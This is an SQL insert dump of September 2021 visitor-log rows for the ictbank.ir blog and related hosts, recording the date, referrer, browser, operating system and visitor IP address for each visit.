(13704,'2021-09-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.185.124','000',0,1,0),
(13705,'2021-09-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(13706,'2021-09-19','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','194.36.97.45','000',0,2,0),
(13707,'2021-09-19','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.174.151.16','000',0,13,0),
(13708,'2021-09-19','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','191.102.156.227','000',0,2,0),
(13709,'2021-09-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.163.176.113','000',0,1,0),
(13710,'2021-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(13711,'2021-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(13712,'2021-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(13713,'2021-09-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13714,'2021-09-19','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','77.222.117.245','000',0,2,0),
(13715,'2021-09-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(13716,'2021-09-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(13717,'2021-09-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13718,'2021-09-20','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','194.15.111.122','000',0,1,0),
(13719,'2021-09-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,3,0),
(13720,'2021-09-20','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,2,0),
(13721,'2021-09-20','http://m.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.122','000',0,2,0),
(13722,'2021-09-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13723,'2021-09-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.68.238.139','000',0,1,0),
(13724,'2021-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.22.129','000',0,2,0),
(13725,'2021-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','80.66.88.100','000',0,2,0),
(13726,'2021-09-20','http://design-arena.ir/blog','Chrome','Android','8.0',NULL,NULL,'','124.126.78.179','000',0,1,0),
(13727,'2021-09-20','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','31.196.140.254','000',0,1,0),
(13728,'2021-09-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','207.180.228.131','000',0,1,0),
(13729,'2021-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.96.253','000',0,1,0),
(13730,'2021-09-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13731,'2021-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(13732,'2021-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(13733,'2021-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13734,'2021-09-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13735,'2021-09-20','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.3',NULL,NULL,'','196.244.192.58','000',0,4,0),
(13736,'2021-09-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','54.236.36.130','000',0,1,0),
(13737,'2021-09-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.130.66.43','000',0,2,0),
(13738,'2021-09-20','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,2,0),
(13739,'2021-09-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','178.159.98.117','000',0,1,0),
(13740,'2021-09-21','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.50.28','000',0,4,0),
(13741,'2021-09-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13742,'2021-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.136.79.154','000',0,2,0),
(13743,'2021-09-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(13744,'2021-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.69.166','000',0,2,0),
(13745,'2021-09-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13746,'2021-09-21','https://google.com','Chrome','Linux','Unknown',NULL,NULL,'','89.248.160.135','000',0,4,0),
(13747,'2021-09-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','160.153.153.13','000',0,1,0),
(13748,'2021-09-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(13749,'2021-09-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.238.175','000',0,1,0),
(13750,'2021-09-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,2,0),
(13751,'2021-09-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(13752,'2021-09-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.248','000',0,1,0),
(13753,'2021-09-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.169','000',0,1,0),
(13754,'2021-09-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.5.155.158','000',0,6,0),
(13755,'2021-09-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','132.145.9.189','000',0,1,0),
(13756,'2021-09-21','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','94.130.146.252','000',0,2,0),
(13757,'2021-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13758,'2021-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(13759,'2021-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13760,'2021-09-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13761,'2021-09-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(13762,'2021-09-21','design-arena.ir','Chrome','Windows','6.1',NULL,NULL,'','64.227.31.196','000',0,4,0),
(13763,'2021-09-21','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','89.19.33.45','000',0,1,0),
(13764,'2021-09-22','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.247','000',0,1,0),
(13765,'2021-09-22','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','191.96.13.176','000',0,5,0),
(13766,'2021-09-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(13767,'2021-09-22','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','213.239.193.124','000',0,9,0),
(13768,'2021-09-22','http://ictbank.ir','Safari','OS X','10.14.6',NULL,NULL,'','185.220.100.253','000',0,1,0),
(13769,'2021-09-22','http://design-arena.ir','Safari','OS X','10.14.6',NULL,NULL,'','185.220.102.4','000',0,2,0),
(13770,'2021-09-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13771,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.61.152','000',0,2,0),
(13772,'2021-09-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.119.210.166','000',0,4,0),
(13773,'2021-09-22','http://www.bing.com','Internet Explorer','Windows','6.1',NULL,NULL,'','204.13.201.137','000',0,1,0),
(13774,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','82.112.184.223','000',0,1,0),
(13775,'2021-09-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.14.143.67','000',0,4,0),
(13776,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.221.172','000',0,1,0),
(13777,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.108.182.5','000',0,1,0),
(13778,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.32.247.184','000',0,1,0),
(13779,'2021-09-22','http://ictbank.ir/blog/impdp-errors-ora-02374-ora-12899/','Internet Explorer','Windows','6.1',NULL,NULL,'','205.185.117.149','000',0,1,0),
(13780,'2021-09-22','http://ictbank.ir/blog','Safari','OS X','10.10.5',NULL,NULL,'','192.3.143.196','000',0,1,0),
(13781,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','65.154.226.220','000',0,2,0),
(13782,'2021-09-22','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(13783,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','144.76.171.180','000',0,2,0),
(13784,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.9.155','000',0,1,0),
(13785,'2021-09-22','http://ictbank.ir/blog','Safari','iOS','14.7.1',NULL,NULL,'','89.199.197.92','000',0,1,0),
(13786,'2021-09-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13787,'2021-09-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.165','000',0,1,0),
(13788,'2021-09-22','http://82.102.9.14','Safari','OS X','10.15.6',NULL,NULL,'','185.31.175.231','000',0,1,0),
(13789,'2021-09-22','http://82.102.9.14','Safari','OS X','10.15.6',NULL,NULL,'','77.247.181.163','000',0,1,0),
(13790,'2021-09-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13791,'2021-09-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(13792,'2021-09-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(13793,'2021-09-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.185.53','000',0,1,0),
(13794,'2021-09-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(13795,'2021-09-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','52.168.176.205','000',0,2,0),
(13796,'2021-09-23','82.102.9.14/','Opera','Windows','5.1',NULL,NULL,'','192.42.116.25','000',0,2,0),
(13797,'2021-09-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.189.111','000',0,2,0),
(13798,'2021-09-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','42.146.78.23','000',0,1,0),
(13799,'2021-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','66.249.82.248','000',0,1,0),
(13800,'2021-09-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','68.183.111.244','000',0,1,0),
(13801,'2021-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.58.69','000',0,2,0),
(13802,'2021-09-23','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.123','000',0,1,0),
(13803,'2021-09-23','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.140','000',0,1,0),
(13804,'2021-09-23','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.242','000',0,1,0),
(13805,'2021-09-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13806,'2021-09-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(13807,'2021-09-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','176.58.122.195','000',0,2,0),
(13808,'2021-09-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.180.219','000',0,1,0),
(13809,'2021-09-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.169','000',0,1,0),
(13810,'2021-09-23','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','65.21.74.96','000',0,1,0),
(13811,'2021-09-23','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','5.188.62.76','000',0,2,0),
(13812,'2021-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','157.245.79.36','000',0,1,0),
(13813,'2021-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.222.72','000',0,1,0),
(13814,'2021-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.148.183','000',0,1,0),
(13815,'2021-09-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(13816,'2021-09-24','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,2,0),
(13817,'2021-09-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','23.148.145.233','000',0,2,0),
(13818,'2021-09-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13819,'2021-09-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.169','000',0,1,0),
(13820,'2021-09-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.170','000',0,1,0),
(13821,'2021-09-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(13822,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.129.103.32','000',0,2,0),
(13823,'2021-09-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,4,0),
(13824,'2021-09-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,16,0),
(13825,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','183.234.167.251','000',0,18,0),
(13826,'2021-09-24','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,1,0),
(13827,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.125.18','000',0,2,0),
(13828,'2021-09-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(13829,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','181.215.204.137','000',0,2,0),
(13830,'2021-09-24','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','10.0',NULL,NULL,'','103.230.255.88','000',0,1,0),
(13831,'2021-09-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,1,0),
(13832,'2021-09-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(13833,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.115.26','000',0,1,0),
(13834,'2021-09-24','http://ictbank.ir','Chrome','Linux','Unknown',NULL,NULL,'','212.119.45.246','000',0,1,0),
(13835,'2021-09-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13836,'2021-09-24','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','62.204.232.22','000',0,1,0),
(13837,'2021-09-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.244.84.146','000',0,2,0),
(13838,'2021-09-24','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','65.21.74.96','000',0,1,0),
(13839,'2021-09-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(13840,'2021-09-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(13841,'2021-09-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,2,0),
(13842,'2021-09-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(13843,'2021-09-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','13.77.170.114','000',0,1,0),
(13844,'2021-09-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','216.172.160.171','000',0,1,0),
(13845,'2021-09-25','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.175','000',0,1,0),
(13846,'2021-09-25','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.51.146.77','000',0,4,0),
(13847,'2021-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(13848,'2021-09-25','http://mail.design-arena.ir/blog','Chrome','Android','8.0',NULL,NULL,'','61.135.15.150','000',0,2,0),
(13849,'2021-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.93.191.127','000',0,2,0),
(13850,'2021-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.176.50','000',0,2,0),
(13851,'2021-09-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(13852,'2021-09-25','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','89.19.33.45','000',0,1,0),
(13853,'2021-09-25','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','89.19.33.91','000',0,1,0),
(13854,'2021-09-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.95.147.29','000',0,2,0),
(13855,'2021-09-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,4,0),
(13856,'2021-09-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.37.130','000',0,1,0),
(13857,'2021-09-25','https://webtechsurvey.com/website/design-arena.ir','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(13858,'2021-09-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13859,'2021-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(13860,'2021-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.182','000',0,1,0),
(13861,'2021-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.226.188','000',0,1,0),
(13862,'2021-09-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13863,'2021-09-25','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(13864,'2021-09-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','180.163.220.5','000',0,1,0),
(13865,'2021-09-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(13866,'2021-09-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.45','000',0,1,0),
(13867,'2021-09-25','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.114','000',0,2,0),
(13868,'2021-09-25','http://www.ictbank.ir/blog','Unknown','Android','10',NULL,NULL,'','121.5.145.96','000',0,2,0),
(13869,'2021-09-25','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(13870,'2021-09-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(13871,'2021-09-25','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','123.171.243.229','000',0,1,0),
(13872,'2021-09-25','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.242.227.2','000',0,5,0),
(13873,'2021-09-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(13874,'2021-09-26','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','213.226.177.153','000',0,1,0),
(13875,'2021-09-26','https://www.google.com/','Samsung Internet','Android','8.1.0',NULL,NULL,'','197.253.253.247','000',0,1,0),
(13876,'2021-09-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(13877,'2021-09-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','52.24.88.101','000',0,2,0),
(13878,'2021-09-26','http://design-arena.ir/blog','QQ Browser','Windows','6.1',NULL,NULL,'','112.245.54.211','000',0,2,0),
(13879,'2021-09-26','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.245.23.100','000',0,1,0),
(13880,'2021-09-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(13881,'2021-09-26','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','71.138.94.108','000',0,2,0),
(13882,'2021-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.95.134','000',0,2,0),
(13883,'2021-09-26','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','45.76.34.100','000',0,2,0),
(13884,'2021-09-26','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','95.179.151.41','000',0,1,0),
(13885,'2021-09-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.95.147.14','000',0,2,0),
(13886,'2021-09-26','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.22.106','000',0,4,0),
(13887,'2021-09-26','http://ictbank.ir/','Pale Moon','Windows','6.1',NULL,NULL,'','81.233.143.38','000',0,3,0),
(13888,'2021-09-26','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','151.234.142.122','000',0,1,0),
(13889,'2021-09-26','http://design-arena.ir/blog','Firefox','iOS','12.1',NULL,NULL,'','23.88.96.33','000',0,2,0),
(13890,'2021-09-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13891,'2021-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13892,'2021-09-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(13893,'2021-09-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.40.14','000',0,1,0),
(13894,'2021-09-26','http://ictbank.ir/blog','Safari','OS X','10.15.7',NULL,NULL,'','78.39.158.26','000',0,1,0),
(13895,'2021-09-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','212.33.207.111','000',0,1,0),
(13896,'2021-09-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,2,0),
(13897,'2021-09-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13898,'2021-09-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13899,'2021-09-26','http://ictbank.ir/blog','Chrome','Android','8.0',NULL,NULL,'','171.13.14.75','000',0,1,0),
(13900,'2021-09-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.165','000',0,2,0),
(13901,'2021-09-27','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.130','000',0,1,0),
(13902,'2021-09-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,2,0),
(13903,'2021-09-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(13904,'2021-09-27','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','37.225.70.122','000',0,1,0),
(13905,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.185.90.57','000',0,1,0),
(13906,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.47.165','000',0,2,0),
(13907,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.18.16.198','000',0,2,0),
(13908,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.110.225.198','000',0,2,0),
(13909,'2021-09-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','104.149.182.190','000',0,2,0),
(13910,'2021-09-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(13911,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','81.233.143.38','000',0,1,0),
(13912,'2021-09-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','45.192.155.136','000',0,1,0),
(13913,'2021-09-27','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','192.198.126.139','000',0,1,0),
(13914,'2021-09-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.217.33','000',0,1,0),
(13915,'2021-09-27','http://ictbank.ir/blog','Chrome','iOS','12.1',NULL,NULL,'','23.88.96.29','000',0,1,0),
(13916,'2021-09-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.246','000',0,2,0),
(13917,'2021-09-27','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','89.19.33.45','000',0,1,0),
(13918,'2021-09-27','anonymousfox.co','Chrome','Windows','10.0',NULL,NULL,'','89.19.33.142','000',0,1,0),
(13919,'2021-09-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(13920,'2021-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.47.104','000',0,1,0),
(13921,'2021-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(13922,'2021-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.200.197','000',0,1,0),
(13923,'2021-09-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.166.25','000',0,1,0),
(13924,'2021-09-27','http://ictbank.ir','Unknown','Windows','10.0',NULL,NULL,'','81.19.214.5','000',0,3,0),
(13925,'2021-09-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(13926,'2021-09-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(13927,'2021-09-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(13928,'2021-09-28','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','154.92.112.84','000',0,1,0),
(13929,'2021-09-28','http://ictbank.ir/blog','Chrome','iOS','12.1',NULL,NULL,'','192.99.18.122','000',0,3,0),
(13930,'2021-09-28','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
